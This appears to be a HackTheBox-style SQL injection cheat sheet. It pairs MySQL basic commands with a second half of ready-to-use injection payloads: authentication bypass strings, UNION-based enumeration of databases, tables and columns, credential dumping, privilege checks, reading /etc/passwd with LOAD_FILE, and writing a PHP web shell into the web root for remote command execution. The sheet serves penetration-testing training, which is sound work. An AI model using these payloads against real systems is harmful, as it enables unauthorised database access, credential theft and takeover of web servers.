SQL Injection Fundamentals
MySQL Basic Commands
mysql -u root -h docker.hackthebox.eu -P 3306 -p
Log in to a remote MySQL server as root (a bare `-p` prompts for the password instead of taking it on the command line, keeping it out of shell history)
SHOW DATABASES
List available databases
USE users
Switch to database
Tables Management
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update column values in the rows matching the condition (omit the WHERE clause and every row in the table is updated)
Columns Manipulation
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn To oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output and Sorting
SELECT * FROM logins ORDER BY column_1
Sort by column ascending
SELECT * FROM logins ORDER BY column_1 DESC
Sort descending
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by multiple columns
SELECT * FROM logins LIMIT 2
Show first two results
SELECT * FROM logins LIMIT 1, 2
Show 2 results after skipping the first one (syntax is LIMIT offset, count; the offset is 0-based)
SELECT * FROM table_name WHERE <condition>
Filter results by condition
SELECT * FROM logins WHERE username LIKE 'admin%'
Filter results by pattern
MySQL Operator Precedence (highest to lowest)
Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)
SQL Injection Payloads
Authentication Bypass
admin' or '1'='1
Basic auth bypass: the injected '1'='1' is always true, and because AND binds tighter than OR the password check no longer matters
admin')--
Auth bypass that closes a parenthesised condition and comments out the rest of the query; in MySQL `--` must be followed by whitespace, so use `-- -` or `#` if a trailing space might be stripped
Union Injection
' order by 1--
Detect number of columns: increase the ORDER BY index until the query errors — the last value that works is the column count
cn' UNION select 1,2,3-- -
Detect number of columns: add values to the UNION until it stops failing with a column-count mismatch
cn' UNION select 1,@@version,3,4-- -
Basic Union injection; place the useful expression in a column position that the page actually renders
UNION select username, 2, 3, 4 from passwords-- -
Union injection against a 4-column query; the numbers are placeholders that only pad the column count
Database Enumeration
SELECT @@version
Get MySQL version
SELECT SLEEP(5)
Delay the response by 5 seconds (fingerprints MySQL and confirms time-based blind injection when no output is visible)
cn' UNION select 1,database(),2,3-- -
Get current database name
cn' UNION select 1, schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA --
List all databases
Table and Column Enumeration
cn' UNION select 1, TABLE_NAME, TABLE_SCHEMA, 4 from INFORMATION_SCHEMA.TABLES where table_schema='dev' --
List all tables in a database
cn' UNION select 1, COLUMN_NAME, TABLE_NAME, TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'--
List all columns in a table
cn' UNION select 1, username, password, 4 from dev.credentials--
Dump data from another database's table
Privilege Checks
cn' UNION SELECT 1, user(), 3, 4--
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"--
Check whether root has the SUPER privilege; reading mysql.user itself needs elevated rights, and the double-quoted string literal only works while ANSI_QUOTES mode is off
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"--
Check all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"--
Check where file read/write is allowed: an empty value means any directory, NULL means file import/export is disabled, and a path restricts operations to that directory
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4--
Read local file /etc/passwd (needs the FILE privilege and a secure_file_priv setting that permits it; returns NULL otherwise)
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file (needs the FILE privilege; the target directory must be writable by the MySQL service account and the file must not already exist, as MySQL refuses to overwrite)
cn' union select "",'<?php system($_REQUEST[0]); ?>', "" into outfile '/var/www/html/shell.php'-- -
Write a PHP web shell into the web root, then execute commands via shell.php?0=<command>; the empty strings pad the column count for a 3-column query